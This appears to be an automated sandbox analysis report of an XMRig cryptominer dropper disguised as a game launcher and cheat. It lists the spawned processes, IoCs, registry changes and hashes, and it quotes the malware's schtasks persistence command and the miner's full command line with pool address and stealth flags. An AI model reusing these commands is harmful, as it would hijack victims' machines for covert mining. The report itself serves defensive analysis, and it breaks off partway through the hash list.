xmrig | c0f2713b2cb88cbfc7b59f97876eaa064a9b43b4ec6cbb12bcd78e20e56f464a

Analysis

max time kernel
123s
max time network
182s
platform
windows7_x64
resource
win7v20210410
submitted
17-07-2021 22:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Cristalix/Cristalix_New_t.exe
Size

6.5MB
MD5

c2b39eba635ba5dc92c1a7aaf6999be3
SHA1

65800969eb6066c6d3632b176d2c7bb97664a69a
SHA256

e3bdbc55c8c0d6eb4c87bf3f3670fbb58d6ed8d87d5feb21b502298532a45fbb
SHA512

611cc6eaadb361cb4a37915c964778d5caa307027d406295cce41986133c682b1b446f65af156a1ab71c8aacda8934ac3cd29c51e0771340553eac3d6a1d5f61

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 3 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1644-111-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral1/memory/1644-112-0x00000001402EB66C-mapping.dmp	xmrig
behavioral1/memory/1644-114-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig

Executes dropped EXE 5 IoCs

Processes:

AlbionOnline cheat v0.1.2.exeCristalixLauncher-3.0.145.exesihost64.exeServices.exesihost64.exe

pid process

2028 AlbionOnline cheat v0.1.2.exe
1980 CristalixLauncher-3.0.145.exe
1596 sihost64.exe
1316 Services.exe
1784 sihost64.exe

pid	process
2028	AlbionOnline cheat v0.1.2.exe
1980	CristalixLauncher-3.0.145.exe
1596	sihost64.exe
1316	Services.exe
1784	sihost64.exe

Loads dropped DLL 6 IoCs

Processes:

Cristalix_New_t.exeAlbionOnline cheat v0.1.2.exeServices.exe

pid	process
1092	Cristalix_New_t.exe
1092	Cristalix_New_t.exe
1092	Cristalix_New_t.exe
2028	AlbionOnline cheat v0.1.2.exe
2028	AlbionOnline cheat v0.1.2.exe
1316	Services.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of SetThreadContext 1 IoCs

Processes:

Services.exe

description pid process target process

PID 1316 set thread context of 1644 1316 Services.exe svchost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1556 schtasks.exe
1764 schtasks.exe

description	pid	process	target process
PID 1316 set thread context of 1644	1316	Services.exe	svchost.exe

pid	process
1556	schtasks.exe
1764	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000069d9b594e233394eacb8e0918afad4f7000000000200000000001066000000010000200000000189205e101f05765b552b32f1e0197af6d63cc02442cf875d48cccab23c23ff000000000e800000000200002000000096bb4bee400f4cd899a3d01b497d0400861927e335e9a3bc8f6b1ca1c1d6644b20000000de8c6c18962da1309e73f357a793d0d3fae5a4a1f276382ae8b11cae82a7e7a040000000be508373c390140da65a8c464cfbac972cf183ad8ec595114dc25eb01bab18cdc3aae13b1b9ed2cd74e4088fbfb20eb23d76d3b82680886c3b93bebfe79ca4da	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "122"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "276"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\ = "122"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "333"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{213723D1-E74F-11EB-8BB5-DE0F3C10814B} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\NumberOfSubdomains = "1"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "209"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\Total = "42"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "42"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "22"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "229"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\Total = "229"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\Total = "209"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\ = "333"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\ = "224"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\ = "209"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\trustarc.com	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\Total = "333"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\ = "276"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\Total = "276"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000069d9b594e233394eacb8e0918afad4f700000000020000000000106600000001000020000000820e8f2b24e810ca2a4b5828a41aa3fb8a9a934b45e1528413a4b79ca5f2ad62000000000e80000000020000200000002a6c9d6985ca487537c868c3ae15b1ad1195920cf28f213c68166fe2c16241ed200100006c7dd5c7c5b4b1801ab97e6439ace728bda08e77e32948b37f6c7397e9aa16ce9d3955dc8db98ba36a4d6a5597a4c24328b121eca69e541c555094cff47cdcece0b54fde0ac94402ec200ad8ac213eea18191b94517539f79c67cb82ad9a761c775163d084350fd26dbd055b615edb14577b4b80b2ab8eabb92bbaf5ef513588c9c0e76fb6e0c02f910733d50564653b7770eb237976e3ae3cfe11569587a2c7ee9d7483240d59154035d4875eca66cf400f36035ae4f9edadcf9690a2cd719e6df5eecd0e112ec2077ccdd7c621fbedb4cab4c17d364708d1a66bf5be50e6f041493f914744edad490ed42155a999013a8a03d7fc24450aff072b37d4854a7ee49d7f3b8e81a9fc7133e3d3729cc7db29d63c1b6234055ecdf25868c1affad440000000f9f1f6f26dfe87e43d769197576f0b3d1e2e8d9e69f99d81a7953208dafa5af6b5bc08e4add439bdae2296684111e3ca1340de3d8b7dbed79297f250ae3780b6	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\Total = "0"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\Total = "22"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\Total = "122"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\Total = "224"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\ = "229"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\trustarc.com\NumberOfSubdomains = "1"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d0e301f95b7bd701	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\ = "42"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "0"	IEXPLORE.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

AlbionOnline cheat v0.1.2.exeServices.exe

pid process

2028 AlbionOnline cheat v0.1.2.exe
2028 AlbionOnline cheat v0.1.2.exe
1316 Services.exe
1316 Services.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

IEXPLORE.EXE

pid process

1108 IEXPLORE.EXE

pid	process
2028	AlbionOnline cheat v0.1.2.exe
2028	AlbionOnline cheat v0.1.2.exe
1316	Services.exe
1316	Services.exe

pid	process
1108	IEXPLORE.EXE

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

AlbionOnline cheat v0.1.2.exeServices.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	2028	AlbionOnline cheat v0.1.2.exe
Token: SeDebugPrivilege	1316	Services.exe
Token: SeLockMemoryPrivilege	1644	svchost.exe
Token: SeLockMemoryPrivilege	1644	svchost.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

iexplore.exe

pid process

368 iexplore.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid process

368 iexplore.exe
368 iexplore.exe
1108 IEXPLORE.EXE
1108 IEXPLORE.EXE
1108 IEXPLORE.EXE
1108 IEXPLORE.EXE

pid	process
368	iexplore.exe

pid	process
368	iexplore.exe
368	iexplore.exe
1108	IEXPLORE.EXE
1108	IEXPLORE.EXE
1108	IEXPLORE.EXE
1108	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 59 IoCs

Processes:

Cristalix_New_t.exeCristalixLauncher-3.0.145.exeiexplore.exeAlbionOnline cheat v0.1.2.execmd.exeServices.execmd.exe

description	pid	process	target process
PID 1092 wrote to memory of 2028	1092	Cristalix_New_t.exe	AlbionOnline cheat v0.1.2.exe
PID 1092 wrote to memory of 2028	1092	Cristalix_New_t.exe	AlbionOnline cheat v0.1.2.exe
PID 1092 wrote to memory of 2028	1092	Cristalix_New_t.exe	AlbionOnline cheat v0.1.2.exe
PID 1092 wrote to memory of 2028	1092	Cristalix_New_t.exe	AlbionOnline cheat v0.1.2.exe
PID 1092 wrote to memory of 1980	1092	Cristalix_New_t.exe	CristalixLauncher-3.0.145.exe
PID 1092 wrote to memory of 1980	1092	Cristalix_New_t.exe	CristalixLauncher-3.0.145.exe
PID 1092 wrote to memory of 1980	1092	Cristalix_New_t.exe	CristalixLauncher-3.0.145.exe
PID 1092 wrote to memory of 1980	1092	Cristalix_New_t.exe	CristalixLauncher-3.0.145.exe
PID 1092 wrote to memory of 1980	1092	Cristalix_New_t.exe	CristalixLauncher-3.0.145.exe
PID 1092 wrote to memory of 1980	1092	Cristalix_New_t.exe	CristalixLauncher-3.0.145.exe
PID 1092 wrote to memory of 1980	1092	Cristalix_New_t.exe	CristalixLauncher-3.0.145.exe
PID 1980 wrote to memory of 368	1980	CristalixLauncher-3.0.145.exe	iexplore.exe
PID 1980 wrote to memory of 368	1980	CristalixLauncher-3.0.145.exe	iexplore.exe
PID 1980 wrote to memory of 368	1980	CristalixLauncher-3.0.145.exe	iexplore.exe
PID 1980 wrote to memory of 368	1980	CristalixLauncher-3.0.145.exe	iexplore.exe
PID 368 wrote to memory of 1108	368	iexplore.exe	IEXPLORE.EXE
PID 368 wrote to memory of 1108	368	iexplore.exe	IEXPLORE.EXE
PID 368 wrote to memory of 1108	368	iexplore.exe	IEXPLORE.EXE
PID 368 wrote to memory of 1108	368	iexplore.exe	IEXPLORE.EXE
PID 368 wrote to memory of 1108	368	iexplore.exe	IEXPLORE.EXE
PID 368 wrote to memory of 1108	368	iexplore.exe	IEXPLORE.EXE
PID 368 wrote to memory of 1108	368	iexplore.exe	IEXPLORE.EXE
PID 2028 wrote to memory of 1768	2028	AlbionOnline cheat v0.1.2.exe	cmd.exe
PID 2028 wrote to memory of 1768	2028	AlbionOnline cheat v0.1.2.exe	cmd.exe
PID 2028 wrote to memory of 1768	2028	AlbionOnline cheat v0.1.2.exe	cmd.exe
PID 1768 wrote to memory of 1556	1768	cmd.exe	schtasks.exe
PID 1768 wrote to memory of 1556	1768	cmd.exe	schtasks.exe
PID 1768 wrote to memory of 1556	1768	cmd.exe	schtasks.exe
PID 2028 wrote to memory of 1596	2028	AlbionOnline cheat v0.1.2.exe	sihost64.exe
PID 2028 wrote to memory of 1596	2028	AlbionOnline cheat v0.1.2.exe	sihost64.exe
PID 2028 wrote to memory of 1596	2028	AlbionOnline cheat v0.1.2.exe	sihost64.exe
PID 2028 wrote to memory of 1316	2028	AlbionOnline cheat v0.1.2.exe	Services.exe
PID 2028 wrote to memory of 1316	2028	AlbionOnline cheat v0.1.2.exe	Services.exe
PID 2028 wrote to memory of 1316	2028	AlbionOnline cheat v0.1.2.exe	Services.exe
PID 1316 wrote to memory of 640	1316	Services.exe	cmd.exe
PID 1316 wrote to memory of 640	1316	Services.exe	cmd.exe
PID 1316 wrote to memory of 640	1316	Services.exe	cmd.exe
PID 640 wrote to memory of 1764	640	cmd.exe	schtasks.exe
PID 640 wrote to memory of 1764	640	cmd.exe	schtasks.exe
PID 640 wrote to memory of 1764	640	cmd.exe	schtasks.exe
PID 1316 wrote to memory of 1784	1316	Services.exe	sihost64.exe
PID 1316 wrote to memory of 1784	1316	Services.exe	sihost64.exe
PID 1316 wrote to memory of 1784	1316	Services.exe	sihost64.exe
PID 1316 wrote to memory of 1644	1316	Services.exe	svchost.exe
PID 1316 wrote to memory of 1644	1316	Services.exe	svchost.exe
PID 1316 wrote to memory of 1644	1316	Services.exe	svchost.exe
PID 1316 wrote to memory of 1644	1316	Services.exe	svchost.exe
PID 1316 wrote to memory of 1644	1316	Services.exe	svchost.exe
PID 1316 wrote to memory of 1644	1316	Services.exe	svchost.exe
PID 1316 wrote to memory of 1644	1316	Services.exe	svchost.exe
PID 1316 wrote to memory of 1644	1316	Services.exe	svchost.exe
PID 1316 wrote to memory of 1644	1316	Services.exe	svchost.exe
PID 1316 wrote to memory of 1644	1316	Services.exe	svchost.exe
PID 1316 wrote to memory of 1644	1316	Services.exe	svchost.exe
PID 1316 wrote to memory of 1644	1316	Services.exe	svchost.exe
PID 1316 wrote to memory of 1644	1316	Services.exe	svchost.exe
PID 1316 wrote to memory of 1644	1316	Services.exe	svchost.exe
PID 1316 wrote to memory of 1644	1316	Services.exe	svchost.exe
PID 1316 wrote to memory of 1644	1316	Services.exe	svchost.exe

C:\Users\Admin\AppData\Local\Temp\Cristalix\Cristalix_New_t.exe
"C:\Users\Admin\AppData\Local\Temp\Cristalix\Cristalix_New_t.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1092

C:\Users\Admin\AppData\Local\Temp\AlbionOnline cheat v0.1.2.exe
"C:\Users\Admin\AppData\Local\Temp\AlbionOnline cheat v0.1.2.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2028

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:1768

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
4⤵
- Creates scheduled task(s)
PID:1556

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
3⤵
- Executes dropped EXE
PID:1596

C:\Users\Admin\AppData\Local\Temp\Services.exe
"C:\Users\Admin\AppData\Local\Temp\Services.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1316

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:640

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
5⤵
- Creates scheduled task(s)
PID:1764

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
4⤵
- Executes dropped EXE
PID:1784

C:\Windows\System32\svchost.exe
C:\Windows/System32\svchost.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6065131 --pass=myminer --cpu-max-threads-hint=30 --donate-level=5 --cinit-idle-wait=4 --cinit-idle-cpu=80 --cinit-stealth
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1644

C:\Users\Admin\AppData\Local\Temp\CristalixLauncher-3.0.145.exe
"C:\Users\Admin\AppData\Local\Temp\CristalixLauncher-3.0.145.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1980

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://java.com/download
3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:368

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:368 CREDAT:275457 /prefetch:2
4⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1108

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
MD5
2902de11e30dcc620b184e3bb0f0c1cb

SHA1
5d11d14a2558801a2688dc2d6dfad39ac294f222

SHA256
e6a7f1f8810e46a736e80ee5ac6187690f28f4d5d35d130d410e20084b2c1544

SHA512
efd415cde25b827ac2a7ca4d6486ce3a43cdcc1c31d3a94fd7944681aa3e83a4966625bf2e6770581c4b59d05e35ff9318d9adaddade9070f131076892af2fa0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
a5ae3fe6535c95758372e774aa9cdf13

SHA1
eddf9bc4dcc8ef3c5a1b201fbc23b72049e1dac4

SHA256
9f2c2582f5fcf58d3517664edc624a7134dd9a7e0cad46c2cc6a29257a79d814

SHA512
db3e4515aa1040baa69ebddbfd2a90fcbbf11132339b642038aba4ec0f0a2c7e7725aed6d46448356dab74225bc91dd946096a5ca8647f6729771406dfb82cba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\sgyae4t\imagestore.dat
MD5
4e45eef00c575fe60a2c6cdc168c7cb9

SHA1
afd36796ef546c03111eb8f944ecfe19da901bef

SHA256
c430966e1d787694fbd3aeefee3ffa91ebbe6790747957dc32591bbeab93a729

SHA512
f36e2d2d6b54662764bc90ab11d4ba07640b3273a09af89931c0d149642796e6a1240128592fcf759c121e7aa75d9e9507f33dd030911a449fd37ad8ca96fcf9

Download Submit
C:\Users\Admin\AppData\Local\Temp\AlbionOnline cheat v0.1.2.exe
MD5
b46efcd7dbf7d2a57ca3e942fffb2214

SHA1
f8cf84367ce616c00e9966bd08d35084eec64010

SHA256
47955703a2e114e77ee02a35df2eae39cebddec17eaa924b9f343241dc9f17a7

SHA512
f5710091e28a80ef56f1cc37ff867282ca0b9086753d22066427c967130660971f86449cbac92bedb5403cb310a760e6d2bb13bc78e2198b973f304d65c0ea7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\AlbionOnline cheat v0.1.2.exe
MD5
b46efcd7dbf7d2a57ca3e942fffb2214

SHA1
f8cf84367ce616c00e9966bd08d35084eec64010

SHA256
47955703a2e114e77ee02a35df2eae39cebddec17eaa924b9f343241dc9f17a7

SHA512
f5710091e28a80ef56f1cc37ff867282ca0b9086753d22066427c967130660971f86449cbac92bedb5403cb310a760e6d2bb13bc78e2198b973f304d65c0ea7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\CristalixLauncher-3.0.145.exe
MD5
25b608146d97e46e5cb8d5d4a77440c5

SHA1
ed5d75d64744a971a7bdb79ba68f4eb0aa7d2cab

SHA256
8504825018e604414d2ebb1093cf249c2f1d56125f6f33a20b071d6a008b8dd9

SHA512
3ae601c91d804c4d6c402ba73263e5749fafdfe35d68d510dc3b632a85d897bb1dc0e48dee4710deaea5932bcf34deb9ca13d4c0c664848abca0372190fb38b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\CristalixLauncher-3.0.145.exe
MD5
25b608146d97e46e5cb8d5d4a77440c5

SHA1
ed5d75d64744a971a7bdb79ba68f4eb0aa7d2cab

SHA256
8504825018e604414d2ebb1093cf249c2f1d56125f6f33a20b071d6a008b8dd9

SHA512
3ae601c91d804c4d6c402ba73263e5749fafdfe35d68d510dc3b632a85d897bb1dc0e48dee4710deaea5932bcf34deb9ca13d4c0c664848abca0372190fb38b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Services.exe
MD5
b46efcd7dbf7d2a57ca3e942fffb2214

SHA1
f8cf84367ce616c00e9966bd08d35084eec64010

SHA256
47955703a2e114e77ee02a35df2eae39cebddec17eaa924b9f343241dc9f17a7

SHA512
f5710091e28a80ef56f1cc37ff867282ca0b9086753d22066427c967130660971f86449cbac92bedb5403cb310a760e6d2bb13bc78e2198b973f304d65c0ea7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Services.exe
MD5
b46efcd7dbf7d2a57ca3e942fffb2214

SHA1
f8cf84367ce616c00e9966bd08d35084eec64010

